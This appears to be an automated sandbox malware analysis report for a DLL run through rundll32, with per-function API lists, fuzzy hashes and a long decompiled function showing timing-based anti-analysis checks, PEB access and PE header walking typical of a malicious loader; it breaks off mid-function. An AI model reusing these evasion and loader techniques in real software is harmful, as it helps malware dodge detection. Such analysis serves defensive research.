Uniqueness Score: -1.00%

Function 6E9B8E70, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 6E9B8ECE
SysAllocString.OLEAUT32(?), ref: 6E9B8F39
_com_issue_error.COMSUPP ref: 6E9B8F75
_com_issue_error.COMSUPP ref: 6E9B8F7F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 1f5c44b7e8de1b6b3e4e2552395064672947824e94017ec103cf0274127eeb73
Instruction ID: 9e4cb41975401ab28725f7c957aa548333105adb8b5542315c10a972eed70a83
Opcode Fuzzy Hash: 1f5c44b7e8de1b6b3e4e2552395064672947824e94017ec103cf0274127eeb73
Instruction Fuzzy Hash: 0E31B3B1A00717DBE774AF95C840B47B7ECEF49B24F20462AE825D7280D774E4808F91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B8D60, Relevance: 6.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6E9B8DC0
_com_issue_error.COMSUPP ref: 6E9B8DFC
_com_issue_error.COMSUPP ref: 6E9B8E06
SysFreeString.OLEAUT32(-00000001), ref: 6E9B8E34

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 8f2f29c890c6ee5a2d6e329ccdf157ff8fd9bf59403bcc1194daa213511327cc
Instruction ID: 0ac237200a53c2e5b79acf7acacd4f70398965d991545377526ab8ce6ba776f6
Opcode Fuzzy Hash: 8f2f29c890c6ee5a2d6e329ccdf157ff8fd9bf59403bcc1194daa213511327cc
Instruction Fuzzy Hash: 2331D4B19107169BD7349F95D804B97FBECEF55B24F10462EE864A7280E7B4E4408F91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C32C0, Relevance: 6.1, APIs: 4, Instructions: 75threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C32CC
GetCurrentThreadId.KERNEL32 ref: 6E9C32DC
LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C330C
SetWindowLongW.USER32 ref: 6E9C335F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: d1d77fd0891ba1c1ced08ce93f9e4113eaf18ac63d1d06a323c77ac4fd9080d3
Instruction ID: a553c5e37df8c5711df6a3a773cb3645deb11d3bd8a11edd0fe1882ef2e1404f
Opcode Fuzzy Hash: d1d77fd0891ba1c1ced08ce93f9e4113eaf18ac63d1d06a323c77ac4fd9080d3
Instruction Fuzzy Hash: 23219232608616AF8B20EFE6D84895B7B69FF85F613944959ED15C7204EB30E811CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CB590, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 6E9CB5AA

Part of subcall function 6E9CB4F7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 6E9CB526
Part of subcall function 6E9CB4F7: ___AdjustPointer.LIBCMT ref: 6E9CB541

_UnwindNestedFrames.LIBCMT ref: 6E9CB5BF
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 6E9CB5D0
CallCatchBlock.LIBVCRUNTIME ref: 6E9CB5F8

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 99f5f1375799140db52f15b1c32330fc856bd3526b23d2e38b3c450cc77e06b4
Instruction ID: 77f0898f5b534d1df29f6d7aa7cd13c5ec2f733623952a794976d65dad9bdeb9
Opcode Fuzzy Hash: 99f5f1375799140db52f15b1c32330fc856bd3526b23d2e38b3c450cc77e06b4
Instruction Fuzzy Hash: EA011732100149BBDF126ED6CD40DEB3B7DEF98B58F044804FE0896120E732E861AFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B90C0, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6E9B90C7
VariantCopy.OLEAUT32(?,?), ref: 6E9B90D1
_com_issue_error.COMSUPP ref: 6E9B90E3
VariantClear.OLEAUT32 ref: 6E9B90F1

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: dc22762909415d96dbafbb1ec11f2763af08e6e2f6ae9ff123fa761a2e6874b7
Instruction ID: 6c4a4b3040cde1e9e14ca5aada63f7463b9f54af28756fe6500d3e6758182aa8
Opcode Fuzzy Hash: dc22762909415d96dbafbb1ec11f2763af08e6e2f6ae9ff123fa761a2e6874b7
Instruction Fuzzy Hash: 04D05EB2A04A2DAB9E252BE59C0CCCB7A2CFF167653004421F700C2100EB75E900CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D7468, Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 6E9D74CC: _free.LIBCMT ref: 6E9D74EC

_free.LIBCMT ref: 6E9D7482

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9D7495
_free.LIBCMT ref: 6E9D74A6
_free.LIBCMT ref: 6E9D74B7

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: de9c0e1c4e4b73d29af6d53943d6a98cbe62b16d16ab2b2aa32d0930f600fee0
Instruction ID: 69a809993fa0d4df249b68d783abea051e1008cc241021b114026347a5e13d50
Opcode Fuzzy Hash: de9c0e1c4e4b73d29af6d53943d6a98cbe62b16d16ab2b2aa32d0930f600fee0
Instruction Fuzzy Hash: ACF01270C10F607B9B017F5899408F53B5DEE7A51E342C51EE4086A210D7B5455F8A81

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BBC70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,B5334A76,00000000,?), ref: 6E9BBCDE

Strings

\PerfmonBar\config.xml, xrefs: 6E9BBD92

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID: \PerfmonBar\config.xml
API String ID: 1514166925-3729978544
Opcode ID: d78ee49eb1703d876762e0854d9fece5a403e53f5bf54bebea3b1d6db5a0f97b
Instruction ID: 80412c9f27ff1f6c735af0c051a5c637ffa7566167cd889968b6738788f0d149
Opcode Fuzzy Hash: d78ee49eb1703d876762e0854d9fece5a403e53f5bf54bebea3b1d6db5a0f97b
Instruction Fuzzy Hash: 0971B071D106189FDB20DFA4CC84B9EB7B4FF48714F104699E919AB280EB70EA44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E560B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E9E5866,?,00000050,?,?,?,?,?), ref: 6E9E56E6

Strings

ACP, xrefs: 6E9E5629
OCP, xrefs: 6E9E565F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 2ea94e97b4c61eea02b848624afade4b576849972757c9757263db1552c1e10e
Instruction ID: 4a3d870b0918f8c2050b0ce297549fed5c48e156d0da0b5afaeae83d15173131
Opcode Fuzzy Hash: 2ea94e97b4c61eea02b848624afade4b576849972757c9757263db1552c1e10e
Instruction Fuzzy Hash: 16213A62A55501AAE7568BD5CD04BCB73AEAF44F24F528824EB05D7A08FB32DE00CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C7FF4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6E9C7876,00000001,00000004,6E9B224A,00000000,?,6E9B1D57,6EA014C0,6E9B5700,6EA014C4,?,6E9B224A,00000004,00000001), ref: 6E9C8078

Strings

ios_base::failbit set, xrefs: 6E9C7FF7

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ios_base::failbit set
API String ID: 1452528299-3924258884
Opcode ID: d7f4f1d4c23142e36f91f8574d9ef50de092391b2c3a9cc891a5ce686561fa9f
Instruction ID: c59e2e6678078a028168d533144ef639bbe4b45feb987a9ad5944e353dee57bb
Opcode Fuzzy Hash: d7f4f1d4c23142e36f91f8574d9ef50de092391b2c3a9cc891a5ce686561fa9f
Instruction Fuzzy Hash: 6E11067324421AAFCF26AF94CC449AEB779BF09B10F014438FA1596210D730E810CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C81F2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6E9B8BC0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6E9FD6E8), ref: 6E9B8BC5
Part of subcall function 6E9B8BC0: GetLastError.KERNEL32(?,00000000,00000000,?,6E9FD6E8), ref: 6E9B8BCF

IsDebuggerPresent.KERNEL32(?,?,?,6E9B11DF), ref: 6E9C8225
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6E9B11DF), ref: 6E9C8234

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E9C822F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: f1ee4e744fc650d237d39d02a89c7a41bebf84574a3bdd9cf6ae725b61cf1af0
Instruction ID: 8e7dc3383f762437b3a819b8409bafd8b68766569d90facc663fe719b8fb3e34
Opcode Fuzzy Hash: f1ee4e744fc650d237d39d02a89c7a41bebf84574a3bdd9cf6ae725b61cf1af0
Instruction Fuzzy Hash: 64E06DB0104B118BD7759FE4C0187427BF8AF59B58F008C2DD596C6A08EB70E048CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DEAB3, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,01173070), ref: 6E9DEB49
GetLastError.KERNEL32 ref: 6E9DEB57
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E9DEBB2

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e7ecdcec119ec7fc9d56ede30a2822f020d8c8537f04a176c4541d37ebf2acb8
Instruction ID: a9ffc421d158c918071a41c1628150152f63bd0b176d01918b7be8b072017cf5
Opcode Fuzzy Hash: e7ecdcec119ec7fc9d56ede30a2822f020d8c8537f04a176c4541d37ebf2acb8
Instruction Fuzzy Hash: 98413A30E04E26AFDB628FE9C8447AEBBB8EF41314F118569E85597194D730E948CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C8508, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E9C3342), ref: 6E9C850D
HeapAlloc.KERNEL32(00000000), ref: 6E9C8514
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E9C855A
HeapFree.KERNEL32(00000000), ref: 6E9C8561

Part of subcall function 6E9C83A7: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E9C8550,00000000), ref: 6E9C83CB
Part of subcall function 6E9C83A7: HeapAlloc.KERNEL32(00000000), ref: 6E9C83D2

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: 74426c28118c8c16c844064c9b0f8189ab288359226d61f42ec87b9977065588
Instruction ID: 91884b5bd2f8bc8ee7544877da3e027186b81f70e72440de7c08854de1b86c52
Opcode Fuzzy Hash: 74426c28118c8c16c844064c9b0f8189ab288359226d61f42ec87b9977065588
Instruction Fuzzy Hash: 1CF0B4B2548B525BCB793BF8A80C95F2A79AFC2F61701485CF649C6248EF70D4018B63

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6280 Parent PID: 6164 rundll32.exeCOMMON

Executed Functions

Function 6E9B6620, Relevance: 80.7, APIs: 44, Strings: 1, Instructions: 1995
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E6E9B6620(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				void* _v28;
				signed char _v36;
				intOrPtr* _v40;
				void* _v44;
				signed char _v48;
				signed int _v52;
				signed int _v60;
				char _v61;
				signed int _v68;
				signed int* _v72;
				signed int _v76;
				signed char _v80;
				signed int _v88;
				signed char _v92;
				intOrPtr* _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v112;
				signed int _v113;
				short _v120;
				signed int _v128;
				signed char _v136;
				signed int _v144;
				signed short* _v152;
				intOrPtr _v156;
				signed char _v160;
				intOrPtr* _v188;
				signed int _v200;
				signed int _v236;
				signed char _v240;
				intOrPtr _v244;
				signed char _v268;
				signed int _v284;
				intOrPtr _v288;
				intOrPtr _v296;
				intOrPtr* _v312;
				signed int _v316;
				signed int _v320;
				intOrPtr _v332;
				intOrPtr _v412;
				char _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v440;
				char _v444;
				intOrPtr* _v448;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t427;
				signed int _t428;
				intOrPtr* _t430;
				signed char _t434;
				signed int _t441;
				signed int _t453;
				intOrPtr* _t455;
				signed char _t456;
				intOrPtr _t461;
				signed int _t462;
				short _t464;
				void* _t465;
				intOrPtr* _t468;
				signed int _t471;
				void* _t479;
				signed char _t480;
				signed char _t481;
				signed char _t483;
				signed int _t486;
				signed int _t498;
				void* _t501;
				int _t503;
				void* _t504;
				void* _t505;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t517;
				signed char _t520;
				signed char _t521;
				void* _t524;
				void* _t528;
				signed int* _t531;
				void* _t533;
				signed char _t543;
				void* _t544;
				signed int _t545;
				char _t555;
				signed char _t557;
				void* _t559;
				void* _t560;
				void* _t562;
				void* _t563;
				void* _t565;
				void* _t568;
				void* _t569;
				intOrPtr _t580;
				void* _t582;
				signed char _t583;
				signed int _t585;
				signed int _t589;
				signed char _t592;
				signed char _t595;
				signed char _t596;
				signed char _t601;
				void* _t608;
				void* _t609;
				signed int _t615;
				signed int _t617;
				signed char _t618;
				signed char _t623;
				signed char _t626;
				void* _t628;
				signed char _t631;
				long _t632;
				signed char _t640;
				signed char _t652;
				void* _t654;
				void* _t655;
				void* _t656;
				signed int _t658;
				signed int _t659;
				void* _t661;
				void* _t665;
				void* _t668;
				signed char _t670;
				signed char _t671;
				void* _t674;
				intOrPtr _t678;
				signed char _t679;
				signed char _t680;
				signed int _t684;
				signed int _t685;
				void* _t691;
				void* _t695;
				signed int* _t697;
				signed int _t707;
				signed int _t709;
				signed int _t713;
				signed int _t714;
				signed int _t718;
				signed int _t719;
				signed int _t729;
				signed int _t739;
				char* _t748;
				signed char _t749;
				signed char _t750;
				long _t772;
				signed short* _t774;
				intOrPtr* _t775;
				signed int _t776;
				intOrPtr _t797;
				intOrPtr _t798;
				signed int _t802;
				signed char _t808;
				void* _t814;
				signed int _t815;
				signed int _t819;
				void* _t821;
				signed int _t822;
				signed int _t823;
				signed int _t827;
				intOrPtr* _t829;
				void* _t838;
				signed int _t841;
				intOrPtr* _t842;
				signed int _t843;
				intOrPtr* _t844;
				signed int _t845;
				void* _t848;
				intOrPtr* _t850;
				signed int _t851;
				unsigned int _t853;
				signed char _t854;
				intOrPtr _t856;
				signed int _t857;
				signed int _t858;
				intOrPtr* _t859;
				signed char _t860;
				signed int _t864;
				signed short _t865;
				signed int _t866;
				void* _t868;
				signed short* _t870;
				void* _t871;
				signed char _t872;
				void* _t873;
				intOrPtr* _t874;
				signed int _t877;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				intOrPtr* _t882;
				signed int _t884;
				void* _t886;
				intOrPtr* _t887;
				void* _t888;
				signed int _t889;
				intOrPtr* _t891;
				signed char _t893;
				signed short* _t894;
				unsigned short _t896;
				signed int _t898;
				signed int _t900;
				signed int _t902;
				signed int* _t904;
				signed int _t905;
				signed char _t906;
				signed int _t907;
				intOrPtr* _t909;
				signed int _t912;
				void* _t913;
				intOrPtr _t914;

				_t674 = __ecx;
				_push(0xffffffff);
				_push(E6E9E93D0);
				_push( *[fs:0x0]);
				_t914 = _t913 - 0x1b0;
				_t420 =  *0x6e9ff008; // 0x7bda3107
				_t421 = _t420 ^ _t912;
				_v24 = _t421;
				_push(__esi);
				_push(_t421);
				_t422 =  &_v16;
				 *[fs:0x0] = _t422;
				_v20 = _t914;
				asm("movups xmm0, [ebp+0x8]");
				asm("movups [ebp-0x1bc], xmm0");
				asm("movups xmm0, [ebp+0x18]");
				asm("movups [ebp-0x1ac], xmm0");
				asm("movups xmm0, [ebp+0x28]");
				asm("movups [ebp-0x19c], xmm0");
				asm("rdtscp");
				_v28 = __ecx;
				if(__edx != 0 || _t422 > 0x989680) {
					_t841 = 0xc2869da;
				} else {
					asm("rdtscp");
					_v28 = __ecx;
					_t841 = _t422;
				}
				asm("rdtscp");
				_v28 = _t674;
				_t427 = E6E9E8A60(_t422 * 0x85d6, 0 + (_t422 * 0x85d6 >> 0x20), 0x5f, 0);
				asm("movd xmm0, edi");
				_t428 = _t427 + 3;
				asm("cvtdq2ps xmm0, xmm0");
				_t877 = _t428;
				_v112 = _t428;
				_v60 = _t877;
				_v288 = _t877;
				_v156 = _t877;
				asm("movss [ebp-0x1c], xmm0");
				asm("movss [ebp-0x24], xmm0");
				asm("xorps xmm0, xmm0");
				asm("movsd [ebp-0xd4], xmm0");
				asm("movsd [ebp-0x170], xmm0");
				asm("movsd xmm0, [0x6e9f9698]");
				asm("movsd [ebp-0xdc], xmm0");
				asm("movsd xmm0, [0x6e9f9558]");
				asm("movsd [ebp-0xac], xmm0");
				asm("movsd [ebp-0xe4], xmm0");
				asm("movsd xmm0, [0x6e9f96c8]");
				_v236 = 0;
				_v316 = 0;
				_v200 = 0;
				_v320 = 0;
				_v128 = 0;
				_v284 = 0;
				_v68 = 0;
				asm("movsd [ebp-0x178], xmm0");
				asm("movsd [ebp-0x90], xmm0");
				__imp__GetTickCount64();
				__imp__GetTickCount64();
				_t430 = _v448;
				_v188 = _t430;
				_v332 = _t430;
				_t432 =  !=  ? _t841 : _t877;
				_v8 = 0;
				_t842 = _v448;
				_v44 =  !=  ? _t841 : _t877;
				while(1) {
					__imp__GetTickCount64();
					__imp__GetTickCount64();
					if( *_t842 != 0x5a4d) {
						goto L256;
					}
					_t678 =  *((intOrPtr*)(_t842 + 0x3c));
					_t434 = _t678 - 0x40;
					if(_t434 > 0x3bf) {
						goto L256;
					}
					_t679 = _t678 + _t842;
					_v36 = _t679;
					_v268 = _t679;
					if( *_t679 != 0x4550) {
						goto L256;
					}
					_t814 = _v44;
					_v8 = 0xffffffff;
					_t680 =  *[fs:0x30];
					asm("movss xmm0, [0x6e9f9774]");
					_v48 = _t680;
					_v240 = _t680;
					asm("movss [ebp-0xf8], xmm0");
					if(_t814 == _t877) {
						asm("movss xmm1, [0x6e9f96dc]");
						asm("movsd xmm2, [0x6e9f9610]");
						asm("movss [ebp-0x18], xmm0");
						asm("movss xmm0, [ebp-0x1c]");
						asm("ucomiss xmm0, xmm1");
						asm("movsd [ebp-0x34], xmm2");
						asm("movss [ebp-0xa0], xmm1");
						asm("lahf");
						__eflags = _t434 & 0x00000044;
						if((_t434 & 0x00000044) != 0) {
							L13:
							_v61 = 0x3f;
							_v28 = 0xb;
							_v88 = 0x15;
							goto L14;
							L18:
							asm("movss xmm0, [0x6e9f974c]");
							asm("comiss xmm1, xmm0");
							asm("movss [ebp-0x24], xmm1");
							asm("movss [ebp-0x1c], xmm1");
							asm("movss [ebp-0x48], xmm0");
							if(__eflags <= 0) {
								L21:
								_t843 = _v68;
								_t814 = _v44;
								goto L22;
							} else {
								_t874 = __imp__CoFreeUnusedLibraries;
								do {
									 *_t874();
									asm("cdq");
									_push(_t814);
									_push(0x6b);
									E6E9B5A30();
									asm("cvttsd2si esi, xmm0");
									_t914 = _t914 + 8;
									asm("movd xmm0, esi");
									asm("cvtdq2ps xmm0, xmm0");
									asm("comiss xmm0, [ebp-0x48]");
									asm("movss [ebp-0x1c], xmm0");
									asm("movss [ebp-0x24], xmm0");
								} while (__eflags > 0);
								goto L21;
							}
							L14:
							__imp__GetShellWindow();
							_v61 = E6E9B5EE0(_v61, _t814);
							asm("cdq");
							_push(_t814);
							_push(_v28);
							E6E9B5A30();
							_t914 = _t914 + 8;
							asm("cvttsd2si edx, xmm0");
							_t684 = _v88 * _t814;
							_v28 = _t814;
							_v88 = _t684;
							_v113 = _t814 - _t684;
							_t685 = _t684;
							_t441 = _t814;
							asm("cdq");
							_t814 = _t441 % _t685;
							_t443 = _t441 / _t685 * _v113;
							asm("movd xmm0, ecx");
							asm("cvtdq2ps xmm0, xmm0");
							asm("ucomiss xmm0, [ebp-0xa0]");
							asm("lahf");
							__eflags = _t441 / _t685 * _v113 & 0x00000044;
							if(__eflags != 0) {
								goto L14;
							} else {
								asm("comiss xmm0, [0x6e9f9730]");
								if(__eflags <= 0) {
									GetOEMCP();
									E6E9E8E30(E6E9B5D90(), _t445);
									asm("movss xmm2, [0x6e9f9560]");
									asm("xorps xmm1, xmm1");
									asm("cvtsd2ss xmm1, xmm0");
									asm("movss [ebp-0xa4], xmm2");
									asm("addss xmm1, xmm2");
								} else {
									asm("movss xmm0, [0x6e9f96f0]");
									_t668 = E6E9E8AFE(_t443);
									_push(_t814);
									_push(_t668);
									E6E9B5A30();
									asm("movss xmm1, [0x6e9f97b0]");
									_t914 = _t914 + 8;
									asm("cvtsd2ss xmm0, xmm0");
									asm("subss xmm1, xmm0");
									asm("movss xmm0, [0x6e9f9560]");
									asm("movss [ebp-0xa4], xmm0");
								}
								goto L18;
							}
						} else {
							asm("movsd xmm3, [0x6e9f95a0]");
							asm("movsd [ebp-0xc0], xmm3");
							do {
								asm("cvttsd2si ecx, xmm2");
								E6E9B5D90();
								asm("movsd xmm1, [ebp-0x34]");
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("subsd xmm1, xmm0");
								asm("movss xmm0, [ebp-0x18]");
								asm("movsd [ebp-0x34], xmm1");
								_t670 = E6E9B5C20(_t680, _t814);
								asm("movsd xmm2, [ebp-0x34]");
								asm("movaps xmm4, xmm0");
								asm("movd xmm1, esi");
								asm("cvtdq2pd xmm1, xmm1");
								asm("movsd xmm0, [ebp-0xc0]");
								asm("divsd xmm1, xmm2");
								asm("addsd xmm0, xmm2");
								asm("movss [ebp-0x18], xmm4");
								asm("cvttsd2si eax, xmm0");
								asm("xorps xmm0, xmm0");
								_t671 = _t670;
								asm("cvtss2sd xmm0, xmm4");
								asm("movd xmm3, eax");
								asm("cvtdq2pd xmm3, xmm3");
								asm("subsd xmm1, xmm0");
								asm("movsd [ebp-0xc0], xmm3");
								asm("addsd xmm1, xmm3");
								asm("cvtpd2ps xmm0, xmm1");
								asm("ucomiss xmm0, [ebp-0xa0]");
								asm("lahf");
								__eflags = _t671 & 0x00000044;
							} while ((_t671 & 0x00000044) != 0);
							goto L13;
						}
					} else {
						_t808 =  *(_t680 + 0xc);
						asm("movss xmm0, [0x6e9f96dc]");
						asm("movss xmm2, [0x6e9f9560]");
						_v48 = _t808;
						_t843 =  *((intOrPtr*)(_t808 + 0x14));
						_v240 = _t808;
						_v68 = _t843;
						asm("movss [ebp-0xa0], xmm0");
						asm("movss [ebp-0xa4], xmm2");
						L22:
						asm("xorps xmm0, xmm0");
						asm("movss [ebp-0x110], xmm0");
